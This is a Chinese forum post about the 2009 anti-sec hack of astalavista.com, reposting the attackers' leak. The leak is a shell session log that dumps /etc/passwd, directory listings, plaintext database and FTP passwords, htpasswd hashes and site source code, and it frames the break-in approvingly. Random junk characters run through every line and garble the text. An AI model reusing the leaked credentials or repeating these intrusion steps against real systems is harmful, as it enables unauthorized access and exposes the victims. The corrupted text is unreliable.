里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。& f- e" u3 X e( L- c. z
L6 k0 z& h+ p7 M- v
[root@front3 ~]# curl -I litespeedtech.com& G1 C: N) Y- q8 v5 a M: n3 k
HTTP/1.1 200 OK8 e- j! g( m: x5 V6 F& g
Date: Fri, 05 Jun 2009 22:54:51 GMT9 @2 {' I8 Y/ `) h/ l' i$ l; u- H
Server: LiteSpeed
$ b7 B8 ?( s, W+ D+ v. t4 c! X3 t/ q0 R! ?' C, P
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-$ Y: M3 n- \- f ?$ t! q
7 ?& O& k/ E- ~. |/ j% Q4 }3 y$ Z% u
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
2 n/ Y) V8 }$ O5 ]7 o& K
/ U' b4 e0 P$ V `) c* ?( J
3 V8 t4 k. g4 J/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ & [' S" A1 y3 O
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
5 X) s* y' R4 z% Y5 ^+ b/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \; G2 `9 I3 r; D \$ c8 l
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
; l" u; G3 ^. X \/ \/ \/ \/ \/ \/ \/
+ D; \) e" S! R) C+ P4 g, E) ` The Hacking & Security Community0 S- [( M+ L/ ~ s: T: i1 p( J% u. e
[+] Founded in 1997 by a hacker computer enthusiast5 \9 K# t+ O+ s
[-] Exposed in 2009 by anti-sec group9 E3 R7 l& a1 S w6 z
4 s. k0 \! p& ^. I1 I8 o' GFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
1 s1 t/ f8 U( Z+ P5 `" ~>> 03. Who’s behind the site?
! d5 f+ d v9 J! E2 X, [$ B>>
( I, r0 _" {! o3 U/ n" |' `: {>> A team of security and IT professionals, and a countless number of contributors from all over the world.
: C& [& I: t) B0 p
5 A( F* G) r7 i$ U& ?>> 05. Is it true that the site is visited by script-kiddies and warez fans only?% w! u2 W& E6 f7 U! U% j z+ U
>>' ~6 \6 `( j! W1 R
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
) ^# x6 n$ B; I g D3 bmilitary institutions.4 N2 [: l3 f" A( U8 Z: _0 B; a
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.* j, |+ w: J; \
: s3 T/ P! `- l% q2 m+ V3 S4 m
Why has Astalavista been targeted?
& D3 F: m4 @5 R' e# g5 ]' h% a. t# l1 N/ Y! K) E( ^
Other than the fact that they are not doing any of this for the “community” but
7 T# r$ U9 l6 z: \( k3 {4 z+ Nfor the money, they spread exploits for kids, claim to be a security community* v& Q4 j3 Y7 e
(with no real sense of security on their own servers), and they charge you $6.66& j5 Y2 |- t+ @- u
per months to access a dead forum with a directory filled with public releases6 e% K) A7 X' r
and outdated / broken services.
/ _# j" D+ y& r: H* O6 W1 {
- ~& d0 w' p/ f' V0 B; ^We wanted to see how good that “team of security and IT professionals” really is.
* N, W0 t# p: D f8 E) S
7 t- Q8 q7 b! ?& X. hLet’s begin.- B7 D7 S5 i4 d. l- F
! B1 w$ \) M" w( k) E" v, J/ ?anti-sec:~# ./g0tshell astalavista.com -p 80
+ m9 V, ]) v7 ~6 x[+] Connecting to astalavista.com:80, p# a# R) q: V \4 U9 X" |
[+] Grabbing banner…
' G+ l3 L( ^# @LiteSpeed3 A1 o6 T. X4 {. \
[+] Injecting shellcode…, e7 R8 a$ j) P Z1 ?% R3 i$ @
[-] Wait for it, a/ b% E1 P! @- V
# Y2 r, m) s" I% c; i1 e L! P2 U
[~] We g0tshell- |7 F- c w( a# `1 W. f9 M- j! d, s! ^( @
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
2 `9 R, m, n4 T* T% C* LID: uid=100(apache) gid=500(apache) groups=500(apache)' q! e4 J: p Z4 |3 i% S" I
) {/ v) D/ l* \( X& csh-3.2$ cat /etc/passwd
3 j$ ?% E) I* q3 `4 u8 s. B. iroot:x:0:0:root:/root:/bin/bash, F4 p, P+ }, S1 @$ O9 S
bin:x:1:1:bin:/bin:/sbin/nologin. }9 x# U$ N# A" j
daemon:x:2:2:daemon:/sbin:/sbin/nologin/ o! a3 ]2 o) R9 b% d, ~. B' X$ r+ A
adm:x:3:4:adm:/var/adm:/sbin/nologin% ?7 q2 F2 m2 h. i. P# D% d% [1 s9 o7 M
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin: g2 V O5 A$ L8 I- z7 F
sync:x:5:0:sync:/sbin:/bin/sync4 U+ J. w* k1 }
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
2 x- x5 |' t2 j l. A" Shalt:x:7:0:halt:/sbin:/sbin/halt
/ W8 l7 P+ G3 u* g2 w9 }' lmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- U- u% [/ Q& ^" r5 k% Y+ b7 {news:x:9:13:news:/etc/news:2 a" |" m( g! M5 e& ? k
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin+ V! Z$ K/ T( Y
operator:x:11:0 perator:/root:/sbin/nologin0 g: n8 f9 z X. {7 E6 z9 F
games:x:12:100:games:/usr/games:/sbin/nologin9 N* G# [1 y9 B' {; P8 e
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
' z% E( \$ f# I+ H tftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" }/ t& y; M5 h" h! I3 q8 `& N
nobody:x:99:99:Nobody:/:/sbin/nologin
2 r: I: ~) d! v$ ^( G4 W+ k+ F4 krpm:x:37:37::/var/lib/rpm:/sbin/nologin# l3 w% l$ V. E$ G! v
dbus:x:81:81:System message bus:/:/sbin/nologin
; B8 R: @( n( g. I$ d' ]nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
3 \# F) U6 N. G! W5 r0 q/ H9 umailnull:x:47:47::/var/spool/mqueue:/sbin/nologin/ n+ S9 G+ H9 ^! C: @1 y. F3 ~* l4 w
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin& V: t+ ]" S& Q% ?; i1 f, H
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin; U i. e3 Z, F9 V
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
* R1 h3 @+ Q8 P# s7 n( G- O& jrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin/ n/ y5 }( d X: s$ p( X
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin' H, s' j0 X5 g) } ]6 b
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin+ R2 s# r% ~8 j0 W4 T
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin2 A( A. |7 H G0 h
pcap:x:77:77::/var/arpwatch:/sbin/nologin+ @6 v. A7 W- w" {' u
named:x:25:25:Named:/var/named:/sbin/nologin. S" ?2 N# T) i6 N
apache:x:100:500::/var/www:/bin/false: {* p; Y$ l- c K
diradmin:x:101:101::/usr/local/directadmin:/bin/bash; s5 j- I% o" Z* E
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash: m9 L* n) L$ G+ k4 M
webapps:x:500:501::/var/www/html:/bin/bash3 P+ ]+ V2 R) h; @, Y( w
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
; S6 l" h: h$ u6 |admin:x:501:502::/home/admin:/bin/bash
' e' w5 w* a; c$ r4 gjon:x:502:503::/home/jon:/bin/bash
6 a$ w! w% V4 I; F; Vcom:x:503:504::/home/com:/bin/bash( m6 z5 T" K( T1 ^. B) A4 f
ntp:x:38:38::/etc/ntp:/sbin/nologin
$ n5 ^+ T, K* s# h( C; iais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
& r* p) H9 S: u% z9 dastanet:x:504:505::/home/astanet:/bin/bash) w! R& Z8 X: K& b8 X: ?( ^
avahi:x:70:70:Avahi daemon:/:/sbin/nologin# f6 ~7 h/ R9 K2 O
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin$ k L# e9 o+ G# [5 D: C* D" {
6 ^0 E6 m$ g* C6 i) z
sh-3.2$ cat /etc/hosts
* f/ S9 M1 i5 c" f, \: n; o# Do not remove the following line, or various programs; Z/ o/ x1 }* f( g/ k
# that require network functionality will fail.7 V& X4 R; K; x+ B# d
127.0.0.1 localhost.localdomain localhost
E3 w9 b/ i$ S::1 localhost6.localdomain6 localhost66 X! p8 ^5 l; v3 k
80.74.154.172 asta1.astalavistaserver.com
9 U* M- o: ~' j0 X2 u! l( Q+ R$ P
m: y) T$ n# w, h) C2 zsh-3.2$ pwd* N: k0 r4 a+ W) A! R+ w% }( l# `* ]
/home/com/public_html
' p2 g8 t; {& E4 `, K8 w+ b0 O: }8 D# w
sh-3.2$ ls -la6 A( ]7 e. L' p1 m3 q2 r8 b. b
total 184605 E3 D' c: v. B1 I& U. ]/ i
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
6 I; P q0 V; R2 a; b( Hdrwx–x–x 11 com com 4096 Jun 25 2008 ..
' K- K+ l( j4 ?: ^6 Cdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
/ ^1 C# j' M3 v) V* h" pdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
* D2 z4 @8 H# @. F) r" z( `2 \drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin% F( J4 c/ I! w
drwxrwxrwx 2 com com 4096 May 19 00:50 config1 y# v0 ]& f1 D5 A
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core9 K$ n U- X7 A
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules4 I, W2 o- b/ `; W; c1 w
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing* B+ Y2 |; ?8 H- l. i$ f8 k
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo6 C. X. H( k% k9 S
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__ m. w8 w9 n7 X
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
. E9 n* ?, q5 D4 cdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd! c+ ~* b- x g* m
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
" { i. A+ E% F+ Y% n7 H$ B-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico0 k2 r7 W( @) U0 N! @% E
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
4 ^+ ~9 \5 e' O5 ~. n$ t-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess; S5 q7 ~9 D$ u5 O. t
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak% \3 u; P1 d3 u; }( m# n# E
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
, |( x7 X( N8 s- Xdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
1 S, } T8 j+ Z# _$ Jdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images2 L. {9 Y# d* _; E! n: z
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php8 b7 R. z; i6 \- |* r
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer$ V v3 j1 {5 X
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
T( c* K2 L; H0 x: p# f3 |drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
% _. T) i: e2 ]$ ?2 v) \drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
1 D% _; @6 U _ L& A$ F- ?drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
8 ?1 H) J4 K* o0 a5 hdrwxr-xr-x 34 com com 4096 May 28 16:30 modules/ n/ U+ n a6 G) J1 O
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin2 ^, n3 p( | P+ o" R. r' a
drwxrwxr-x 22 com com 4096 May 28 17:06 _new; d' \! S Z0 o! }
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
1 P6 G( W3 H$ T+ E5 m1 G* Gdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy- e L2 J* W2 W8 w9 }% x3 u; [
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
. X4 I% w, z; z# P& x-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
9 }6 o* e& f2 G3 p8 L-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
; z# e4 i8 N' ?4 l7 x" F7 A-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
+ ^ i: E4 t3 q" Cdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
8 y+ B' g. j1 f5 _( Q* c; {drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp; O; B8 @% b+ k/ L
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
- I. M) w" n( Q" m% H3 Y) l% W5 _
- q% ~: p' J6 N/ _sh-3.2$ head -20 index.php! k+ l7 L- K6 d+ A' x
<?php# O0 V$ {. c/ I0 y- X- U
! O) v( h' d' c% C6 B, c4 G/**( |! V$ L6 G7 ?3 i+ m5 p
* The main page for the CMS
% X. L4 U1 y r! i o) Y* @copyright CONTREXX CMS - COMVATION AG
! I2 u' @; M' h5 _* @author Comvation Development Team
0 e! e/ g: _; r/ e2 R* @version v1.0.9.10.1 stable
h; }; s$ t" Z6 b' ]5 u2 g! ~* @package contrexx
! {: y3 d0 a5 Q; p; c: k* @subpackage core: \- x1 k2 l) w; }5 `3 F- Z/ g
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage. V- c( O1 u- \* c; y6 L# ?1 Q+ K9 t
* @since v0.0.0.0$ E2 }) d; v/ A5 \& e' z
* @todo Capitalize all class names in project
- T! P9 P2 P+ z( D$ @7 q* @uses /config/configuration.php
! j/ T9 k3 c' y7 r g7 H* @uses /config/settings.php
/ V3 _# Z, x& {* H! R7 A. x* @uses /config/version.php1 [8 [* N1 _- i4 Y
* @uses /core/API.php8 Y. ?- o( T; ]
* @uses /core_modules/cache/index.class.php
* }! M5 M. q" p2 j9 ]* @uses /core/error.class.php
) m8 P' h1 [. N# l K; s! _* @uses /core_modules/banner/index.class.php
) @7 {% a6 A! b) D. Y+ i3 c* @uses /core_modules/contact/index.class.php
8 T+ W2 U/ U3 k& D1 K8 K! @, W: o" m
sh-3.2$ cd config/
" c7 O0 {* W% a% s3 Z0 {7 a. osh-3.2$ ls -la0 y- r! Y5 o/ s: i; X- _, g: p, B
total 328 }$ }9 o1 n" Q! M( O
drwxrwxrwx 2 com com 4096 May 19 00:50 .
0 h# c! h8 T% a# G. ddrwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 A/ c& m `; |# r1 N
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php/ b5 W# b1 e) @* n {6 A8 Y
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php, o* }& j; |$ X1 c3 F. j
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php* K- r+ T, P( \; N9 B. s
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php% c4 h8 t9 ^4 V
/ r; D% r4 P ?/ ^ s( ^( G, _* \
sh-3.2$ cat configuration.php
3 V8 G1 n8 w( ~[snip]8 \8 ]' F# j; G g; K
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
! ^, e7 b# G$ F# q1 W" g5 R# @$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
' J( S q( p5 X+ ^: z. y* H: v; x$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix1 E. e. ^ _2 z8 \4 @
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username7 J2 C! X6 {! D( i
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password% m0 R6 x8 T5 W7 \
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)8 ?# w5 L# w" i" T( k8 w
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)' Y$ m' |7 ~8 c4 h7 ^
[snip]
( H# J0 N5 s E2 V h! }8 N. h4 F$_FTPCONFIG['is_activated'] = true; // Ftp support true or false# r4 q' b0 C) f& r
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
; b( b4 Z h9 F8 A$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
% j# }8 ?- J1 S# `2 p8 ]$_FTPCONFIG['port'] = 21; // Ftp remote port
2 @& }* d6 `- Z+ o$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
/ @9 n( r! X% ~3 t1 i! Q# c$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password7 a" l- p6 {7 |3 V
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
; U% p* L! w) E- ~0 e
, u2 E1 b7 v: ~0 O# R0 }sh-3.2$ cd ..
+ \: F! S+ X9 G$ I6 n0 Ssh-3.2$ cd dvd/
7 Z y- C: X, I/ ?' j" r, \. ~& zsh-3.2$ ls -la
3 Q2 f7 K; [$ [! o# ntotal 2913780
! w1 C" Y/ {6 I8 p1 d6 I) `drwxr-xr-x 2 com com 4096 Sep 9 2008 ./ B2 N/ ^7 x, w6 _$ T# ~$ Z+ F
drwxr-xr-x 30 com apache 4096 May 28 17:06 ... @9 B% d! B' ~* W% |6 ^
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar" {7 V# T7 C3 w! {$ ~6 x
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
4 M, y4 p ^9 V1 z: {* A, `2 f/ C-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
4 t" c }9 \# V$ P: k-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess& b, d' ?) {# e4 o: T
5 _7 g; C3 R- I6 R2 u9 {9 Ksh-3.2$ cat .htaccess2 _8 M, S% N& j# \1 Z
authType Basic$ D' j$ z' w% x
authName DVD9 F4 f, Q% h/ c0 k5 E
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
0 A: C2 Y$ {/ [# B! w! m: @require valid-user
) R* Q% w }1 [* ^6 |1 [) B$ X5 E
3 Y6 V: i* K0 H( z! l+ i- `" Gsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
0 C K4 W: o% mDVDdownload:CRD8cuY6.MPT6: H% M s; Z1 P: O+ m
DVDdownload2:CR8a36.wluFMg8 V' _6 o7 g5 o' |
" h7 c. p6 _$ l' i) M; [
sh-3.2$ cat test.php
6 g9 M9 t7 L2 L+ E8 n* l<?php5 l6 D/ f: y' t9 e- F
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
3 z1 N+ o7 L/ t4 b4 @$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
1 X3 ]/ \9 U# a* n X: Eecho $url;/ j/ u) [7 G/ `6 Q8 p
?>, g+ W1 u: n5 [" j
+ K) z/ w0 y% y" ~ @
sh-3.2$ cd modifications/! R6 N7 `* ?- B, \, u( F& `3 `
sh-3.2$ ls -la
: K* r! y2 Z7 Gtotal 32 ?6 y% S7 m8 I0 I. m7 z2 P
drwxr-xr-x 8 com com 4096 May 11 12:48 . v; i, D! q2 q8 J; c; B, ^. u
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..2 S" U# [6 w9 [+ |+ z* q5 b
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng8 _- x$ f: N. t* ^, G7 R7 A6 d
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs" j; Z) {6 q9 k. b+ y1 [, ]7 i% V- s
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
/ k& }: v$ z" z r" @drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
# Q" |* z5 S7 s- qdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search( X$ P. m3 K2 L4 j7 J |2 z
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp4 ~8 Q# D# G' Y, A$ T. _2 o* f+ |
- n; t# Q# y% y' T' dsh-3.2$ ls -R
" I1 H5 \! r. F: `& Z% Z4 Z- ?1 v5 O.:
* L2 |- D. a5 A- I# J/ T9 V+ ~5 ~- H) |com_avtng cronjobs onlinetools pjirc search _tmp
% W' Z# |$ V6 r' b
# ]2 a6 r0 R* B' m) C6 \. ]./com_avtng: _# b) j x( a6 @
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts# Q0 o, d4 O7 [# ^) @1 N0 u
. C( r7 r# D& j9 ?+ Q6 q) R# j
./com_avtng/scripts:
4 c! o) `0 ]8 J* r; N& Z1 w- G* Bpopunder.js& k9 B- |% C* s9 N
# S6 u5 x, t1 ^/ Q% k( S* J# G, N./cronjobs:
! }4 B/ F9 s5 Mexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp9 u9 x/ w" d" v1 T( w
5 o ^3 f7 A% J* m3 {; P, E% V
./cronjobs/tmp:
6 e1 s( g9 ]# G7 }8 dcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
" q/ B8 U% e+ j6 z& A0 d' c2 ?& v
./onlinetools:
" Y3 J2 _- y9 V7 ^: G6 Tindex.php
0 Q2 }5 D* J" O0 q
% T; }( c, z. b8 C( S./pjirc:
' z- h* C2 L5 h$ r" i( Da_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
% w% |4 V! R q* @AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
9 Z" p* U9 w: n0 `; Z% wbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd! i% B' l- b ~% a
% R8 T9 q% n: R5 \$ q./pjirc/img:( O, w2 {3 K* d+ C
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif6 n& u, A% Z$ ]. `3 X, w9 c
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
: d" o/ B; Q5 Y0 Zverre-eau.gif" n1 V' l- ~9 U7 V
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
# J8 q7 e) x, z' P! ]verre-vin.gif
' J' T5 ~4 C2 G4 _* l3 p6 ~ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif; @* p9 Q* d3 M% G3 [
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif) u: n* r; M6 d: w7 H* O, f$ ~8 e3 S
& H6 c- t6 Q% t$ U4 ?; I; g: L
./pjirc/snd:
7 a6 h& m& l' k8 v/ M' Z6 n; Nbell2.au ding.au6 E# {4 w! d9 |# ^+ U
' `1 i6 T1 d8 x/ o" X./search:) ]! c" U. ^0 ?
searchEngines.php search.php
$ L, U7 w( v1 H$ P8 B1 T& e8 Y" `1 h! d
./_tmp:. o8 C$ H# p! ~5 T
defaultPorts.php defaultPorts.txt# n' r$ i7 g- d& O/ i( y. n
7 p1 k. c4 ^2 _4 e
sh-3.2$ cd cronjobs/
' T: D& T4 A$ ksh-3.2$ cat exploits.php8 x0 \+ ^" T! e' L
[snip]/ C) w8 u2 @( T N9 [' I' k6 w
$categories = array();# T4 r% ~( h- O6 l% \
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
6 B: _* p/ G, i4 R' f X( F$expolits = file($milw0rmFile);
! q9 W2 ]* Y+ r' C8 l$comExploits = array();& q2 ]0 g; \- c3 i. k4 Y
[snip]
: p1 z8 O- L6 W; E2 ~* N; f3 {// manage data, u/ H/ {+ J! L2 n
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
5 Y* x0 l# f" L! X8 w3 U8 H/ K+ Y: A: Q% K5 r: C$ G' m
// get path and title( d; ^) A3 B! S
$expolits[$x] = trim($expolits[$x]);! D+ M% k. p: j! o+ o- w' ]
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));! l# B- g! ?- V3 w8 t
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);8 N0 M) G8 G; g* M8 l5 v U) R
3 D1 @7 g/ L3 _0 I4 H1 n* X0 [ // check if file exists
9 I0 \- }$ D X# v0 a/ _1 S' c if (file_exists($path)) {
7 ^5 Y) @7 z: r- M. a$ i Z- L( j/ S8 s$ m
$text = file_get_contents($path);+ s0 L3 Z5 b- n! v
7 F8 F$ A- x) y3 z0 e$ F$ U. b- a: e
// get content and date
( P( w8 s+ l" L$ ^% o5 Q' M' d( a( g //$text = htmlspecialchars($text, ENT_QUOTES);* r0 z& U7 U% ^* \6 C) a$ x
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));! P T$ n. d- A9 d' ], L! }. x
if ($tmptext != ”) {( F9 l! X) B9 j! C/ |/ V2 L
$text = $tmptext;9 g$ m9 k0 o$ D0 v# y; M
} else {2 n; F; m3 h8 Y' N4 q
$text = addslashes(htmlentities($text, ENT_QUOTES));
: n/ _5 |. m7 w: w; B }3 m3 U+ m- S- C$ e& f) F% \
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));) s* ]6 g) z, ]! C' w3 v
$tmp = explode('-', $date);% y: x. y3 K2 b( g
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
6 k8 j8 W. w: P2 [ $cat = getCategory ($path);
' Q$ ]" i1 n! S. {9 l( U& r $ext = pathinfo(basename($path));& f) I8 V# E. z1 \/ L& L, _4 i
$ext = $ext['extension'];
7 B8 k% a5 S8 C $qStr = ”
. h4 T; [$ P. ^ u+ i SELECT `id`
, t. S! T" L4 K `% Z( o- J FROM `contrexx_module_exploits`8 r, F! C) H7 v9 s y
WHERE `title` = ‘” . $title . “‘- x* n% i! U3 E. M, m
AND `date` = ‘” . $date . “‘: Z6 g+ M) U) h: S& D
“;
4 C/ }7 o4 k; o" g& k echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
. K: a! C) Q& |% n $q = $_objDB->query($qStr);1 ^, x" j' w. Q$ r% O7 J9 o. w/ Z1 ?
; z. M# O; k7 B if ($q->numRows() == 0) {6 l1 x$ ]# `1 y# t# {
( C; V) V% L6 H" X3 F* x" s5 U
// prepare array
' G/ [0 q9 p" ?/ D7 B $comExploits[$x]['date'] = $date;
6 m% O) b. Q. m8 Z $comExploits[$x]['title'] = $title;1 v# n- I! w: d; h
$comExploits[$x]['author'] = ‘milw0rm’;
: _9 N6 \2 I9 |+ z $comExploits[$x]['text'] = $text;! u( @ _/ R& N% Q
$comExploits[$x]['source'] = $ext;
3 E; w X3 x; N, K1 a5 G $comExploits[$x]['url1'] = ”;$ \( G/ G, d0 k- D
$comExploits[$x]['url2'] = ”;
& M1 R V- }( t$ r $comExploits[$x]['catid'] = $cat;
: `" R1 U" p- D $comExploits[$x]['lang'] = ‘2′;
! d; c5 o6 A/ F7 ` $comExploits[$x]['userid'] = ‘12′;
# q% A' o8 I* b2 T) k3 J $comExploits[$x]['startdate'] = ‘0000-00-00′;9 e0 F9 O5 q- z1 y+ f
$comExploits[$x]['enddate'] = ‘0000-00-00′;9 u$ O) M x( u0 V( [
$comExploits[$x]['status'] = ‘1′;
% h6 C* M- J4 L $comExploits[$x]['changelog'] = $date;$ r y M. X0 Z: a1 j( H
- b) T3 I* Y, P: E4 z0 p
}5 S! `; ]/ x2 {+ a' Y
[snip]
' ]9 B/ o. F; j. z) g% r $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
& b- [0 S7 s! }' A8 z<rss version=”2.0″>& d. E$ s# n4 t# m9 N* M( `
<channel>
, w& ^0 N7 ?! ?9 m% t! ] <title>ASTALAVISTA.com - Exploits</title>0 \* O. C5 E: b# c$ W3 {- U3 g v
<link>http://www.astalavista.com/exploits</link>
/ [7 N V$ `8 H <description>All availably Exploits.</description>
4 a, i- ]( h' j <language>en-us</language>
